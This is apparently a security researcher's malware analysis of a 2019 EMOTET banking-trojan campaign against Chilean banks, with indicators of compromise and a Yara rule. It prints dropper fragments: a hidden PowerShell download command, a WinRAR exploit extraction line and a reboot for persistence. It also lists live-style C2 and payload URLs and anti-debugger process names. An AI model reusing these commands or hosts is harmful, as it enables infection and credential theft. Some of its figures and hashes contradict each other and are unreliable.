Reading Time: 11 minutes

EMOTET spread in Chile targeted financial and banking services. SI-LAB detected hundreds of users that were impacted by this malware between March 18th and 26th of 2019.

The last days of March 2019 are making headlines due to a targeted cyber attack involving a new variant of infamous EMOTET malware. This threat is known as a banking trojan malware that collects financial information by injecting malicious code into a computer.

EMOTET has evolved in its delivery, however, this wave was conducted with the most prominent form: inserting malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat occurred between March 18th and 26th of 2019. Once again, the main goal of this campaign involving EMOTET had the propose of exfiltrating financial credentials from user’s computers to access financial and banking services geolocated in Chile.

The first phase identified as “__Denuncia_Activa_CL.PDF.bat” is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world and its source-code is obfuscated in order to evade antivirus detection and complicate its analysis.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

 

The .bat file is a Windows batch script that is responsible for downloading a second script from the Command & Control (C&C) server. The latter leverages the WinRar/Ace vulnerability (CVE-2018-20250) dropping the malware itself into the Windows startup folder. Next, the infected machine will reboot and malware becomes persistent in the system startup.

The high-level workflow this campaign is illustrated below.

emotet-diagram

 

EMOTET was protected with an extreme commercial packer dubbed Themida. Themida introduced an additional protection layer that made it harder to analyze. Other restrictions were also coded to prevent its execution in different types of scenarios. In this case, for instance, malware authors introduced several anti-run specifications related to victims’ geolocation and language preferences — only Spain/Chile computers were compromised.

Themida packer has a large group of specific features that are very appreciated by criminals to protect their threats. For example, it uses VM-protection techniques, debug-protection, virtual machine emulation, anti-monitors techniques, anti-memory patching (see all Themida features here).

The first alert related to this wave was observed on March 22nd by The Computer Security Certified Response Team (CSIRT), of the Ministry of the Interior from Chile.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.

 

CSIRT released a comprehensive list of IP addresses that EMOTET signals had to block. A national alert was sent (below) and can be consulted in this URL.

communication

 

Another global alert was also shared by Chile CSIRT on March 23th. 2019.

 

SI-LAB detected that this attack started some days before the alerts were published. The second malware phase (denuncias.rar); which used WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself was uploaded by criminals to the opendir C2 server on March 18th, 2019. We can note below, in Technical  Analysis, that the malware was uploaded again later into another web folder on March 21st — maybe an update/change performed by its operators to improve their functionalities or to fix some bug.

emotet-3

 

As aforementioned, EMOTET only executes inside victim’s computers with Spain/Chile configured as their primary language and this can be an indicator that points to a global target attack.

After several rounds to understand the malware, we found that some Chile financial and banking organizations were targeted, including:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

 

emotet-4

 

When the malware is executed without any restrictions, i.e., upon a non-virtualized environment, some information from the victim’s computer is send to C2 server. Data includes date/hour of infection, remote IP from victim’s computer, OS version and antivirus name.

emotet-5

 

This information was available online on the opendir C2 server and SI-LAB analysed data in order to understand the total of infections and victims impacted this malicious targeted attack.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims’ IP addresses, based on their geolocation, that were collected from all the data in the opendir C2 server. Color intensity is correlated with the number of infections, being the darkest red equivalent to 175 infections in Chile.

 

GeoMap of Threats

EMOTET Victims of Cyber Threat in Chile

 

As indicated on the GeoMap of Threats, Chile, USA, Germany and France were the countries with most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

Governmental agency CSIRT and Cybersecurity National System from Chile are currently fighting this growing threat and have been working on increasing awareness among users in the country. They encourage users to stay tuned for their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

 

 

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 were underlined for the bad reasons — a global cyber threat targeted financial institutions and banks from Chile via EMOTET banking trojan malware.

This campaign was conducted via an initial malscan wave adding malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users where impacted by this wave; 176 only in Chile. This malware is not new and, once gain, the main goal was exfiltration of credentials from user’s to access financial and banking services geolocated in Chile.

The first malware phase identified as “__Denuncia_Activa_CL.PDF.bat” is seen as the maestro of all operations strictly well-planed by criminals. This file was delivered via malscam campaigns around the world and its code is obfuscated in order to evade antivirus detection and make harder its analysis. Figure 1 (below) shows the batch script encoded in Little-endian UTF-16.

emotet-6

Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.

 

After some rounds was possible to get the malware source-code in ASCII. Let’s look below.

Figure 2: EMOTET malware deobfuscated — the first phase.

 

In general, the malicious batch script performs the following actions:

1. Generates random name to rename the 2nd stage (dropper)

First, the malware generates a random name to rename the 2nd file downloaded from C2 server (the stage that executes the WinRar/Ace vulnerability — CVE-2018-20250). The latter will drop the EMOTET itself onto the Windows startup folder (discussed later).

In detail, on lines 33, 34 and 35 we can observe that the second stage is download to the victim’s download folder. Next image presents the output generated from the batch file.

emotet-8__

Figure 3: Malware source-code output – the first phase.

 

2. Drops 2nd stage: PowerShell command is executed to drop the WinRar exploit ‘denuncias.rar’ file.

PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%'

 

The 2nd stage is downloaded from C2 server and is renamed (“25RqcZpQ3.rar”) and placed into “C:\Users\root\Downloads” folder.

emotet-9

Figure 4: Download path – the first phase.

 

As shown, this file is downloaded from an opendir C2 server. Note that C2 server has available this file in two different directories, namely:

http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardecoded in 1st stage of malware)

 

emotet-3

emotet-11

Figure 5: 2nd stage available to download in two different directories.

 

3. Extracts EMOTET via WinRar: After the 2nd stage download (‘denuncias.rar’), the file is executed and the malware itself (‘Integrity.exe’ – EMOTET) is dropped by WinRar/ACE vulnerability onto Windows startup folder; see lines 38 – 42 in Figure 2.

%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%

 

4. Pings for delay simulation

ping 127.0.0.1 -n 1 > nul

 

5. Reboot for malware persistence

Once the command shutdown -r is executed the Windows will reboot. This step will create the malware persistence as the EMOTET extracted from 2nd stage places it in Windows startup folder. While a normal reboot by the user would also have the same effect,  for some reason this campaign doesn’t want to wait until the user initiates the reboot.

Upon reboot, the malicious program “Integrity.exe” (EMOTET malware) gets into action and connects to the Command and Control (C&C) server.

Figure 6: Infection graph generated and extracted from Virus Total.

 

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

emotet-1

Figure 7: No detection were identified by VT.

 

 

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe interesting artifacts.

emotet-10

Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.

 

As shown, the string “C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe” is found. In fact, this is the CVE-2018-20250 just saying “hello world, I’m here!” 🙂

In detail, if UAC is running, when you attempt to extract the archive it will fail to place the malware in the “C:\ProgramData” folder due to lack of permissions. This will cause WinRAR to display an error stating “Access is denied” and “operation failed”.

On the other hand, if UAC is disable or WinRAR is run with administrator privileges it will install the malware to the next path:

C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

 

Extracting all the files we can take and analyse the malware itself.

emotet-12

Figure 9: EMOTET malware (‘Integrity.exe”) dropped by 2nd stage.

 

More details on CVE-2018-20250 here.

 

 

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Deeping into the last malware infection stage, we are facing the EMOTET trojan banker — a credential stealer malware that is infecting user’s from Chile in the last months.

At the first glance, the malware is protected with the packer Themida 2.x. This is a terrible notice for malware analysts.

Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the books, combined with many different obfuscation methods. 

In a Themida binary, different parts of the code are run in virtual machines and it obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language. 

 

Figure 10 shows the binary was developed in Delphi; nonetheless, we will not decompile it because Themida is very hard to unpack and that task is extremely complex.

emotet-13

Figure 10: Packer and compiler detected — Themida 2.x and Delphi.

 

As we can see below (Figure 11 and 12), and to reinforce the packer presence,  some sections are null name values, and other ones have high entropy (around 8.0). This is a clear signal that we are facing a challenge: Themida packer!

15

Figure 10: EMOTET section entropy.

 

Figure 11 below illustrates in middle that great part this file is really packed.

emotet-25

Figure 11: Emotet file entropy.

 

On the one hand, another perfect indicator that Themida is here is the PE file import table (IAT). The IAT is partial destroyed and just a function from kernel32.dll DLL can be observed: lstrcpy.

Figure 12: EMOTET IAT (result from Themida packer).

 

Dig into the details

Themida packer is, in fact, a constant challenge for malware analysts. The approach that we used to get some inspection from malware file was dump it from memory when it is running. Notwithstanding, remember that just little pieces of code are devirtualized by Themida during its execution. And kept in mind that Themida will detect anti-monitors techniques against file and registry monitors as well.

First, virtual machine need to be tuned as well as the perfect conditions to simulate the infection scenario as real as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some registries in Windows Registry — malware get its values to evade possible detection.

emotet-17

Figure 13: Changes performed in HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\DESCRIPTION\System | SystemBiosDate and VideoBiosVersion registries.

 

But nothing is perfect. The malware verifies all time the processes are running in the system and terminates if any of them are found (this is a evade technique used by Themida packer and available here). This is one of the many features this modern packer.

indicators = [
                "OLLYDBG",
                "GBDYLLO",
                "pediy06",
                "FilemonClass",
                "File Monitor - Sysinternals: www.sysinternals.com",
                "PROCMON_WINDOW_CLASS",
                "Process Monitor - Sysinternals: www.sysinternals.com",
                "RegmonClass",
                "Registry Monitor - Sysinternals: www.sysinternals.com",
                "18467-41",
]

 

Well, backing to EMOTET, and after dumping it from memory, we observed some things such as some DLLs imported and the malware strings.

Just few blocks of EMOTET can be analysed as Themida runs based on a virtual machine environment. Thus, malware functions are devirtualized in real time, and we cannot fix the IAT properly as well.

emotet-18

Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.

 

After dump it from memory, we need observe that only some DLLs are rebuild. We suspect that other ones continuing hidden. Both Anti-VM and and anti-dbg tecnhiques were again detected after dump the malware. This is not newly! 🙁

However, some info can be extracted from the binary. When it is executed in victim’s computers,  initial info is send to C2 server (a specie of “EHLO” message with some arguments).

Figure 15: EMOTET  C2 server URL.

 

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

 

Figure 16 presents a query performed by malware in order to identify the antivirus name running in the infected machine. Winmgmts is a WMI service within the SVCHOST process running under the “LocalSystem” account.

emotet-20

Figure 16: EMOTET collects antivirus product name via WMI query.

 

The file “up.php” writes all the entries to another file called “tictic.txt“. Every time  that a victim is infected, a EHLO request is send to “up.php” that writes the infection data highlighted above inside this file.

emotet-26

Figure 17: EMOTET C2 files available in a opendir.

 

Through this file available in an opendir C2 was possible to build an GeoMap of Threats presented at the beginning of the article.

After processing the data we detected that 1089 user’s were infected during this campaign. As pointed out, Chile, USA, Germany and France were the countries with more hits. From a total of 1089, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

But is important answer this question: What kind of data is collected by this trojan banker? —Banking credentials, of course.

 

EMOTET drops a sqlite3.dll DLL during its execution in order to use it to get data from sqlite databases from the installed popular web-browsers.

emotet-21

emotet-22

Figure 18: EMOTET collects data from main popular web-browsers.

 

During static analysis was also possible observe the targeted banks and financial institutions involved in this attack, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

emotet-23

Figure 19: Banks and financial institutions involved in this attack.

 

Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.

monitor

Figure 20: Administration panel used in recent variants by EMOTET.

 

Another interesting aspect is the following string observed in past EMOTET infections and hardcoded inside many malware samples.

C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

 

This is a drag’n’drop interface support file for Delphi 5,6,7,2005,2006 & C++Builder. We could not retrieve any more information about this library in malware.

During this analysis we detect that malware performs several connections to “www.bing.com” — maybe to validate a successful connection to the Internet.

emotet-24

Figure 21: Internet connection is validated during EMOTET execution.

 

Curious that after several memory dumps we detect some interesting strings are changing in memory. In a specific moment we get the following:

75EE6DE16BB9D5BE439A3EF523A83AFA
BICE
C852CE43C4D6371C2DA82AD878D20420
64FF1C0E1F0D0962E878D57DAAF36980E903B51530D0
B2ADBB5BD210030E1B6C82E6524BA740EE6D9E
2E29C77CA62FA75D8ADC7FB690C8D87B9732E37C97B84983D8CF5F9449ED
BBVA
50C560964C889B83EF71E713C11243F21DBE6FBE4A85A922
212DC56494CF022FDC79D7B3B214B971D8123297FD003291CF
D97482A059F06188A526A28681C20823
C650E40229AAF90830A3AD
ITA
CC57EF022BAC2F04297BF728CFF324C360E71EBC6183A5
8C94A257F056F65CF1205A8AAD918191B71DCA013EDE01
64F00236E66EFC240866E60A359A
A1A85B9C5CF95BF72775C2A6AE29A75C8297AF20C4788ACC075B83
SANTA
5DF40FD0084580AA52405E3A3AA221D30A1F37A95287BB1EB42DD1BC43F3053D94
59F50E2BDC72D5BEA7F50B28D00D4C3BC71CCF759C4AFD57FF171431D91EDB
64FF34F315499D
B8509C5B8C9E2B00094487BD65E173B198F054A743F007425490BF6394AD44E47CA48587AE4DEE03
AAB671B06FE66981B8EA2B0F17419F548A9FB728DC1022A43F9348252BCB6D95CC
ACB74CEB034053DD01418280A72FA253
CORP
D945F333DA788E49F161F622046DE2023C9E489846
ESTADO
5FF80F2CC30175A35487D80C6A83D81CC60334A45233FC294485A049F139
8E89BF7FAE2C42FE3F92C571D71146EF2AAC5E8E4829F6235383BF6E8CF4023C6AFCAB55FB08
BCA75C9BB21066924B9E30DBBD32AB5883C768E41FD065EC78DC
3FD86F8CA3215583BB2FA05432BB11D5025201538CED60F95CF911C96883
61FA0926C5077FB962F16590F61D0D053B9E5488B15296
948FA545E466B551FA295F83AA2EA3
CHILE
2A23DD01389537D30B19A68282DA798BB3E60E42282AC11FBD14
50F926C264D2C1599E3E90F464BD30C67CEA1F0E38DCAFC619B56C9C
8C85A145F565E248C11DBE759C29BA79
BE87512029A426D375DA0FC6A02474E10A4DF5543EE31A0E67F82CD578
2F28DC1A31928188A723
BCI
9883B34C36AB2B0061B3CB7DAB27BC6781C1
64FF36CEA2C015CC0C4984A1534AF640CB18C316CFAEA333AA
FB679F58344B8BB06FE6698E4789C86BC20A6F80AB5BED69BF35D60D
B1AA5996B517041CCD034BF925A02A
SECU
44DF14D37BD8CB59F65181A74B8ECA7BEE3AD90A32D465B121B8964E7FB543E83FEE4EF826D91EC7789AB12B5E83EE13B563F831CC
FALA
F36F85A24A8B9895BA1545E30F429E57
F41C28DE021050FE2AAD13C6A0CE0431C81FDD
WebPay
2727D96DF161E9
E9649C5E983093BF6BAB3CEF1B0277B49D3EE66085B685C1074E8CA04E36C264B2698BBD6C8AFD34EF53F36D9A4FFD5383A9FD1725D7134124
ServiPag
F8152FF02BA624CE7A9ACE7AA1
2932CE659F24BA6287D97AA98F3565F01BBC65E54CDE11B41FBF6F9CBE75B8
SCOTI
A8B67C8CB629BD7AD62EA85D89D77B8BB7

 

This seems a encrypted strings with specific information about banking systems (maybe, endpoints — we don’t know).

One way to understand the malware totally is devirtualize all entire code. As shown, Themida packer make harder the malware analysis and that was a big challenge during this investigation.

 


Thank you to all who have contributed in this analysis:

-National CSIRT at Chile @CSIRTGOB
-João Arnaut
-hasherezade @hasherezade
-1ZRR4H @WWWSecurity


 

Indicators of compromise (IOC)

Hashes

Batch script:
9008b75ac8bbaacbda0dc47bb7d631f1c791cb346cc6f6a911e7993da0834c09
1e541b14b531bcac70e77a012b0f0f7f
0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81

RAR archive:
b5a84e8079dc8558d3960d711d8591500b69cf79e750ecaf88919e398c59383f
1e541b14b531bcac70e77a012b0f0f7f
0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81

Malware Payload (EMOTET):
421448d92a6d871b218673025d4e4e121e263262f0cb5cd51e30853e2f8f04d7
98172becba685afdd109ac909e3a1085
cbb0377ec81d8b120382950953d9069424fb100e

DNS

triosalud.cl
hxxp://5.39.218[.]210/dns/dns.php?dns=<random>"
hxxp://5.39.218[.]210/dns/logs/logpc.php
hxxp://185.29.8[.]45/1.exe
http://www.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar
http://www.triosalud.cl/wp/wp-content/uploads/2019/03/denuncias.rar
https://www.triosalud.cl/wp/wp-content/uploads/2019/03/tictic.txt
https://www.triosalud.cl/wp/wp-content/uploads/2019/03/up.php

More IPs available here.

 

Other interesting string

C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

 

Yara rule

import "pe"

rule EMOTET_Chile {
  meta:
  description = "Yara rule for EMOTET Chile - April version"
  author = "SI-LAB - https://seguranca-informatica.pt"
  last_updated = "2019-04-10"
  tlp = "white"
  category = "informational"

  strings:
    $emotet_chile_a = {31 A8 31 AC 31 B0 31 28}
    $emotet_chile_b = {00 69 00 67 00 52 00 65 00 64}
    $emotet_chile_c = {44 65 6C 70 68 69}
    $emotet_chile_d = {64 76 33 48 82 48 46 38 5C 08 B0 25}

  condition:
    all of ($emotet_chile_*) and pe.number_of_sections == 6 and (pe.version_info["CompanyName"] contains "BigRed" and pe.version_info["OriginalFilename"] contains "BigRed") and (pe.version_info["FileDescription"] contains "BigRed")
}

Yare rule is also available on GitHub.